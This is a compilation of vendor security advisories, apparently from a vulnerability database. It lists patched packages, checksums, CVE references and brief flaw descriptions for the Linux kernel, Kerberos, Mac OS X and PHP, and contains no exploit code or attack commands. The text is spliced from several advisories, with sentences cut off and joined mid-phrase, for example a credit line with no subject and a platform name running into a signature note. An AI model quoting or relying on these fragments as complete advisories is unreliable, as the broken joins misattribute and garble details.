perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
i386:
kernel-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm
kernel-devel-2.6.32-220.23.1.el6.i686.rpm
kernel-headers-2.6.32-220.23.1.el6.i686.rpm
perf-2.6.32-220.23.1.el6.i686.rpm
perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
noarch:
kernel-doc-2.6.32-220.23.1.el6.noarch.rpm
kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm
perf-2.6.32-220.23.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
i386:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm
perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
python-perf-2.6.32-220.23.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
x86_64:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0044.html
https://www.redhat.com/security/data/cve/CVE-2012-1179.html
https://www.redhat.com/security/data/cve/CVE-2012-2119.html
https://www.redhat.com/security/data/cve/CVE-2012-2121.html
https://www.redhat.com/security/data/cve/CVE-2012-2123.html
https://www.redhat.com/security/data/cve/CVE-2012-2136.html
https://www.redhat.com/security/data/cve/CVE-2012-2137.html
https://www.redhat.com/security/data/cve/CVE-2012-2372.html
https://www.redhat.com/security/data/cve/CVE-2012-2373.html
https://access.redhat.com/security/updates/classification/#important
https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.2_Technical_Notes/kernel.html#RHSA-2012-0743
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFP3zJcXlSAg2UNWIIRAlFPAJ9ov0UCSkIqz63r+6YXL9bf0+ADOQCfUIzx
w/ZsFuOkCnr15/XGPkEszEQ=
=D/pm
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. (CVE-2012-0045)
A flaw was discovered in the Linux kernel's cifs file system. (CVE-2012-1090)
H.
(CVE-2012-1097)
A flaw was discovered in the Linux kernel's cgroups subset. (CVE-2012-1146)
A flaw was found in the Linux kernel's handling of paged memory. (CVE-2012-1179)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.10:
linux-image-3.0.0-19-generic 3.0.0-19.33
linux-image-3.0.0-19-generic-pae 3.0.0-19.33
linux-image-3.0.0-19-omap 3.0.0-19.33
linux-image-3.0.0-19-powerpc 3.0.0-19.33
linux-image-3.0.0-19-powerpc-smp 3.0.0-19.33
linux-image-3.0.0-19-powerpc64-smp 3.0.0-19.33
linux-image-3.0.0-19-server 3.0.0-19.33
linux-image-3.0.0-19-virtual 3.0.0-19.33
After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
linux-server, linux-powerpc), a standard system upgrade will automatically
perform this as well. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
Ubuntu update for linux-lts-backport-oneiric
SECUNIA ADVISORY ID:
SA48987
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48987/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48987
RELEASE DATE:
2012-05-01
DISCUSS ADVISORY:
http://secunia.com/advisories/48987/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48987/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48987
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Ubuntu has issued an update for linux-lts-backport-oneiric.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
USN-1433-1:
https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-May/001672.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
(CVE-2011-4347, Moderate)
* A flaw was found in the way the Linux kernel's XFS file system
implementation handled on-disk Access Control Lists (ACLs).
(CVE-2012-0038, Moderate)
* It was found that the Linux kernel's register set (regset) common
infrastructure implementation did not check if the required get and set
handlers were initialized. Peter Anvin for reporting CVE-2012-1097.
This update also fixes the following bugs:
* When a RoCE (RDMA over Converged Ethernet) adapter with active RoCE
communications was taken down suddenly (either by adapter failure or the
intentional shutdown of the interface), the ongoing RoCE communications
could cause the kernel to panic and render the machine unusable. A patch
has been provided to protect the kernel in this situation and to pass an
error up to the application still using the interface after it has been
taken down instead. (BZ#799944)
* The fix for Red Hat Bugzilla bug 713494, released via RHSA-2011:0928,
introduced a regression. Attempting to change the state of certain
features, such as GRO (Generic Receive Offload) or TSO (TCP segment
offloading), for a 10 Gigabit Ethernet card that is being used in a
virtual LAN (VLAN) resulted in a kernel panic. (BZ#816974)
* If a new file was created on a Network File System version 4 (NFSv4)
share, the ownership was set to nfsnobody (-2) until it was possible to
upcall to the idmapper. As a consequence, subsequent file system operations
could incorrectly use "-2" for the user and group IDs for the given file,
causing certain operations to fail. In reported cases, this issue also
caused "Viminfo file is not writable" errors for users running Vim with
files on an NFSv4 share |
|
var-200701-0517
|
Untrusted search path vulnerability in writeconfig in Apple Mac OS X 10.4.8 allows local users to gain privileges via a modified PATH that points to a malicious launchctl program. A vulnerability exists in the Kerberos administration daemon that may allow a remote, unauthenticated user to free uninitialized pointers. Freeing uninitialized pointers corrupts memory in a way that could allow an attacker to execute code. According to Apple information, it may be possible to execute arbitrary code with system privileges.
A successful attack can allow local attackers to gain superuser privileges.
Mac OS X 10.4.8 is reported vulnerable; other versions may be affected as well.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
Try it out online:
http://secunia.com/software_inspector/
----------------------------------------------------------------------
TITLE:
Fedora Core 6 update for krb5
SECUNIA ADVISORY ID:
SA23706
VERIFY ADVISORY:
http://secunia.com/advisories/23706/
CRITICAL:
Highly critical
IMPACT:
DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Fedora Core 6
http://secunia.com/product/12487/
DESCRIPTION:
Fedora has issued an update for krb5. This fixes some
vulnerabilities, which can be exploited by malicious people to cause
a DoS (Denial of Service) or potentially compromise a vulnerable
system.
For more information:
SA23690
SA23696
SOLUTION:
Apply updated packages.
Fedora Core 6:
43b1b9c946f30629489b903961472d9b0cdf1cd8 SRPMS/krb5-1.5-13.src.rpm
43b1b9c946f30629489b903961472d9b0cdf1cd8 noarch/krb5-1.5-13.src.rpm
42b9b525ea97d128ed22c6feb7b48cc377ca46ad
ppc/debug/krb5-debuginfo-1.5-13.ppc.rpm
51c9dfac74d9026509906e953cf92ac50e1a13c4
ppc/krb5-workstation-1.5-13.ppc.rpm
39a5ed204a75766df9daf51a66971f51700d563c
ppc/krb5-server-1.5-13.ppc.rpm
bce7df56293ae51d79ce1e054b3056d24a1ae8d5
ppc/krb5-devel-1.5-13.ppc.rpm
9097a6f8fdda32e8b976b0beb2b03ba66172327e
ppc/krb5-libs-1.5-13.ppc.rpm
51c1f15fca97f267cabd1d1a9851a349fc5a3648
x86_64/krb5-workstation-1.5-13.x86_64.rpm
7cc0d54545539827434c7975697c9c13ae9e4797
x86_64/debug/krb5-debuginfo-1.5-13.x86_64.rpm
71fcdc5dadb273576ad9e530fbb15764650cb84b
x86_64/krb5-devel-1.5-13.x86_64.rpm
bbe8f1b3e7c6077526f760b361ad6ca5d4039276
x86_64/krb5-libs-1.5-13.x86_64.rpm
e38c1dccd2310d3bab9d204226988aee627cfe0d
x86_64/krb5-server-1.5-13.x86_64.rpm
02ddf8b25bea088b4de3cc8c27fcf3eb2967efa6
i386/debug/krb5-debuginfo-1.5-13.i386.rpm
d6470636e983d8559d4378f819fba80b467af0a5
i386/krb5-libs-1.5-13.i386.rpm
278c19ec68ed47d35c5c2370df5c48807dba1224
i386/krb5-workstation-1.5-13.i386.rpm
aa72a083b60ddfb3dbc0761f13ea7147e09995f1
i386/krb5-server-1.5-13.i386.rpm
9cfd3d1d48deb0e7f83a0a13a5ddf2383386b400
i386/krb5-devel-1.5-13.i386.rpm
ORIGINAL ADVISORY:
http://fedoranews.org/cms/node/2375
OTHER REFERENCES:
SA23690:
http://secunia.com/advisories/23690/
SA23696:
http://secunia.com/advisories/23696/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
|
|
var-201503-0206
|
Use-after-free vulnerability in the phar_rename_archive function in phar_object.c in PHP before 5.5.22 and 5.6.x before 5.6.6 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger an attempted renaming of a Phar archive to the name of an existing file. PHP is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: php54 security and bug fix update
Advisory ID: RHSA-2015:1066-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1066.html
Issue date: 2015-06-04
CVE Names: CVE-2014-8142 CVE-2014-9427 CVE-2014-9652
CVE-2014-9705 CVE-2014-9709 CVE-2015-0231
CVE-2015-0232 CVE-2015-0273 CVE-2015-1351
CVE-2015-2301 CVE-2015-2305 CVE-2015-2348
CVE-2015-2787 CVE-2015-4147 CVE-2015-4148
=====================================================================
1. Summary:
Updated php54 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server. The php54 packages provide a recent stable release of PHP with
the PEAR 1.9.4, APC 3.1.15, and memcache 3.0.8 PECL extensions, and a
number of additional utilities.
The php54 packages have been upgraded to upstream version 5.4.40, which
provides a number of bug fixes over the version shipped in Red Hat Software
Collections 1. (BZ#1168193)
The following security issues were fixed in the php54-php component:
An uninitialized pointer use flaw was found in PHP's Exif extension.
(CVE-2014-9705)
A heap buffer overflow flaw was found in PHP's regular expression
extension. (CVE-2015-2305)
A buffer over-read flaw was found in the GD library used by the PHP gd
extension.
An attacker able to trigger certain error condition in phar archive
processing could possibly use this flaw to disclose certain portions of
server memory. (CVE-2014-9652)
It was found that PHP move_uploaded_file() function did not properly handle
file names with a NULL character. (CVE-2015-2348)
A flaw was found in the way PHP handled malformed source files when running
in CGI mode.
(CVE-2014-9427)
The following security issue was fixed in the php54-php-pecl-zendopcache
component:
A use-after-free flaw was found in PHP's OPcache extension.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
php54-2.0-1.el6.src.rpm
php54-php-5.4.40-1.el6.src.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.src.rpm
x86_64:
php54-2.0-1.el6.x86_64.rpm
php54-php-5.4.40-1.el6.x86_64.rpm
php54-php-bcmath-5.4.40-1.el6.x86_64.rpm
php54-php-cli-5.4.40-1.el6.x86_64.rpm
php54-php-common-5.4.40-1.el6.x86_64.rpm
php54-php-dba-5.4.40-1.el6.x86_64.rpm
php54-php-debuginfo-5.4.40-1.el6.x86_64.rpm
php54-php-devel-5.4.40-1.el6.x86_64.rpm
php54-php-enchant-5.4.40-1.el6.x86_64.rpm
php54-php-fpm-5.4.40-1.el6.x86_64.rpm
php54-php-gd-5.4.40-1.el6.x86_64.rpm
php54-php-imap-5.4.40-1.el6.x86_64.rpm
php54-php-intl-5.4.40-1.el6.x86_64.rpm
php54-php-ldap-5.4.40-1.el6.x86_64.rpm
php54-php-mbstring-5.4.40-1.el6.x86_64.rpm
php54-php-mysqlnd-5.4.40-1.el6.x86_64.rpm
php54-php-odbc-5.4.40-1.el6.x86_64.rpm
php54-php-pdo-5.4.40-1.el6.x86_64.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.x86_64.rpm
php54-php-pecl-zendopcache-debuginfo-7.0.4-3.el6.x86_64.rpm
php54-php-pgsql-5.4.40-1.el6.x86_64.rpm
php54-php-process-5.4.40-1.el6.x86_64.rpm
php54-php-pspell-5.4.40-1.el6.x86_64.rpm
php54-php-recode-5.4.40-1.el6.x86_64.rpm
php54-php-snmp-5.4.40-1.el6.x86_64.rpm
php54-php-soap-5.4.40-1.el6.x86_64.rpm
php54-php-tidy-5.4.40-1.el6.x86_64.rpm
php54-php-xml-5.4.40-1.el6.x86_64.rpm
php54-php-xmlrpc-5.4.40-1.el6.x86_64.rpm
php54-runtime-2.0-1.el6.x86_64.rpm
php54-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
php54-2.0-1.el6.src.rpm
php54-php-5.4.40-1.el6.src.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.src.rpm
x86_64:
php54-2.0-1.el6.x86_64.rpm
php54-php-5.4.40-1.el6.x86_64.rpm
php54-php-bcmath-5.4.40-1.el6.x86_64.rpm
php54-php-cli-5.4.40-1.el6.x86_64.rpm
php54-php-common-5.4.40-1.el6.x86_64.rpm
php54-php-dba-5.4.40-1.el6.x86_64.rpm
php54-php-debuginfo-5.4.40-1.el6.x86_64.rpm
php54-php-devel-5.4.40-1.el6.x86_64.rpm
php54-php-enchant-5.4.40-1.el6.x86_64.rpm
php54-php-fpm-5.4.40-1.el6.x86_64.rpm
php54-php-gd-5.4.40-1.el6.x86_64.rpm
php54-php-imap-5.4.40-1.el6.x86_64.rpm
php54-php-intl-5.4.40-1.el6.x86_64.rpm
php54-php-ldap-5.4.40-1.el6.x86_64.rpm
php54-php-mbstring-5.4.40-1.el6.x86_64.rpm
php54-php-mysqlnd-5.4.40-1.el6.x86_64.rpm
php54-php-odbc-5.4.40-1.el6.x86_64.rpm
php54-php-pdo-5.4.40-1.el6.x86_64.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.x86_64.rpm
php54-php-pecl-zendopcache-debuginfo-7.0.4-3.el6.x86_64.rpm
php54-php-pgsql-5.4.40-1.el6.x86_64.rpm
php54-php-process-5.4.40-1.el6.x86_64.rpm
php54-php-pspell-5.4.40-1.el6.x86_64.rpm
php54-php-recode-5.4.40-1.el6.x86_64.rpm
php54-php-snmp-5.4.40-1.el6.x86_64.rpm
php54-php-soap-5.4.40-1.el6.x86_64.rpm
php54-php-tidy-5.4.40-1.el6.x86_64.rpm
php54-php-xml-5.4.40-1.el6.x86_64.rpm
php54-php-xmlrpc-5.4.40-1.el6.x86_64.rpm
php54-runtime-2.0-1.el6.x86_64.rpm
php54-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
php54-2.0-1.el6.src.rpm
php54-php-5.4.40-1.el6.src.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.src.rpm
x86_64:
php54-2.0-1.el6.x86_64.rpm
php54-php-5.4.40-1.el6.x86_64.rpm
php54-php-bcmath-5.4.40-1.el6.x86_64.rpm
php54-php-cli-5.4.40-1.el6.x86_64.rpm
php54-php-common-5.4.40-1.el6.x86_64.rpm
php54-php-dba-5.4.40-1.el6.x86_64.rpm
php54-php-debuginfo-5.4.40-1.el6.x86_64.rpm
php54-php-devel-5.4.40-1.el6.x86_64.rpm
php54-php-enchant-5.4.40-1.el6.x86_64.rpm
php54-php-fpm-5.4.40-1.el6.x86_64.rpm
php54-php-gd-5.4.40-1.el6.x86_64.rpm
php54-php-imap-5.4.40-1.el6.x86_64.rpm
php54-php-intl-5.4.40-1.el6.x86_64.rpm
php54-php-ldap-5.4.40-1.el6.x86_64.rpm
php54-php-mbstring-5.4.40-1.el6.x86_64.rpm
php54-php-mysqlnd-5.4.40-1.el6.x86_64.rpm
php54-php-odbc-5.4.40-1.el6.x86_64.rpm
php54-php-pdo-5.4.40-1.el6.x86_64.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.x86_64.rpm
php54-php-pecl-zendopcache-debuginfo-7.0.4-3.el6.x86_64.rpm
php54-php-pgsql-5.4.40-1.el6.x86_64.rpm
php54-php-process-5.4.40-1.el6.x86_64.rpm
php54-php-pspell-5.4.40-1.el6.x86_64.rpm
php54-php-recode-5.4.40-1.el6.x86_64.rpm
php54-php-snmp-5.4.40-1.el6.x86_64.rpm
php54-php-soap-5.4.40-1.el6.x86_64.rpm
php54-php-tidy-5.4.40-1.el6.x86_64.rpm
php54-php-xml-5.4.40-1.el6.x86_64.rpm
php54-php-xmlrpc-5.4.40-1.el6.x86_64.rpm
php54-runtime-2.0-1.el6.x86_64.rpm
php54-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
php54-2.0-1.el6.src.rpm
php54-php-5.4.40-1.el6.src.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.src.rpm
x86_64:
php54-2.0-1.el6.x86_64.rpm
php54-php-5.4.40-1.el6.x86_64.rpm
php54-php-bcmath-5.4.40-1.el6.x86_64.rpm
php54-php-cli-5.4.40-1.el6.x86_64.rpm
php54-php-common-5.4.40-1.el6.x86_64.rpm
php54-php-dba-5.4.40-1.el6.x86_64.rpm
php54-php-debuginfo-5.4.40-1.el6.x86_64.rpm
php54-php-devel-5.4.40-1.el6.x86_64.rpm
php54-php-enchant-5.4.40-1.el6.x86_64.rpm
php54-php-fpm-5.4.40-1.el6.x86_64.rpm
php54-php-gd-5.4.40-1.el6.x86_64.rpm
php54-php-imap-5.4.40-1.el6.x86_64.rpm
php54-php-intl-5.4.40-1.el6.x86_64.rpm
php54-php-ldap-5.4.40-1.el6.x86_64.rpm
php54-php-mbstring-5.4.40-1.el6.x86_64.rpm
php54-php-mysqlnd-5.4.40-1.el6.x86_64.rpm
php54-php-odbc-5.4.40-1.el6.x86_64.rpm
php54-php-pdo-5.4.40-1.el6.x86_64.rpm
php54-php-pecl-zendopcache-7.0.4-3.el6.x86_64.rpm
php54-php-pecl-zendopcache-debuginfo-7.0.4-3.el6.x86_64.rpm
php54-php-pgsql-5.4.40-1.el6.x86_64.rpm
php54-php-process-5.4.40-1.el6.x86_64.rpm
php54-php-pspell-5.4.40-1.el6.x86_64.rpm
php54-php-recode-5.4.40-1.el6.x86_64.rpm
php54-php-snmp-5.4.40-1.el6.x86_64.rpm
php54-php-soap-5.4.40-1.el6.x86_64.rpm
php54-php-tidy-5.4.40-1.el6.x86_64.rpm
php54-php-xml-5.4.40-1.el6.x86_64.rpm
php54-php-xmlrpc-5.4.40-1.el6.x86_64.rpm
php54-runtime-2.0-1.el6.x86_64.rpm
php54-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
php54-2.0-1.el7.src.rpm
php54-php-5.4.40-1.el7.src.rpm
php54-php-pecl-zendopcache-7.0.4-3.el7.src.rpm
x86_64:
php54-2.0-1.el7.x86_64.rpm
php54-php-5.4.40-1.el7.x86_64.rpm
php54-php-bcmath-5.4.40-1.el7.x86_64.rpm
php54-php-cli-5.4.40-1.el7.x86_64.rpm
php54-php-common-5.4.40-1.el7.x86_64.rpm
php54-php-dba-5.4.40-1.el7.x86_64.rpm
php54-php-debuginfo-5.4.40-1.el7.x86_64.rpm
php54-php-devel-5.4.40-1.el7.x86_64.rpm
php54-php-enchant-5.4.40-1.el7.x86_64.rpm
php54-php-fpm-5.4.40-1.el7.x86_64.rpm
php54-php-gd-5.4.40-1.el7.x86_64.rpm
php54-php-intl-5.4.40-1.el7.x86_64.rpm
php54-php-ldap-5.4.40-1.el7.x86_64.rpm
php54-php-mbstring-5.4.40-1.el7.x86_64.rpm
php54-php-mysqlnd-5.4.40-1.el7.x86_64.rpm
php54-php-odbc-5.4.40-1.el7.x86_64.rpm
php54-php-pdo-5.4.40-1.el7.x86_64.rpm
php54-php-pecl-zendopcache-7.0.4-3.el7.x86_64.rpm
php54-php-pecl-zendopcache-debuginfo-7.0.4-3.el7.x86_64.rpm
php54-php-pgsql-5.4.40-1.el7.x86_64.rpm
php54-php-process-5.4.40-1.el7.x86_64.rpm
php54-php-pspell-5.4.40-1.el7.x86_64.rpm
php54-php-recode-5.4.40-1.el7.x86_64.rpm
php54-php-snmp-5.4.40-1.el7.x86_64.rpm
php54-php-soap-5.4.40-1.el7.x86_64.rpm
php54-php-xml-5.4.40-1.el7.x86_64.rpm
php54-php-xmlrpc-5.4.40-1.el7.x86_64.rpm
php54-runtime-2.0-1.el7.x86_64.rpm
php54-scldevel-2.0-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-8142
https://access.redhat.com/security/cve/CVE-2014-9427
https://access.redhat.com/security/cve/CVE-2014-9652
https://access.redhat.com/security/cve/CVE-2014-9705
https://access.redhat.com/security/cve/CVE-2014-9709
https://access.redhat.com/security/cve/CVE-2015-0231
https://access.redhat.com/security/cve/CVE-2015-0232
https://access.redhat.com/security/cve/CVE-2015-0273
https://access.redhat.com/security/cve/CVE-2015-1351
https://access.redhat.com/security/cve/CVE-2015-2301
https://access.redhat.com/security/cve/CVE-2015-2305
https://access.redhat.com/security/cve/CVE-2015-2348
https://access.redhat.com/security/cve/CVE-2015-2787
https://access.redhat.com/security/cve/CVE-2015-4147
https://access.redhat.com/security/cve/CVE-2015-4148
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVcBYSXlSAg2UNWIIRAoT1AJ9XFBGeD9SIxEla6ub7VHSrmJAtcgCfSjPe
YJoyzmnxjsdToxpNcMlTQOw=
=BUIg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6) - i386, x86_64
3.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/php-5.4.40-i486-1_slack14.1.txz: Upgraded.
Please note that this package build also moves the configuration files
from /etc/httpd to /etc, /etc/php.d, and /etc/php-fpm.d.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.40-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.40-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.40-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.40-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.8-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.8-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
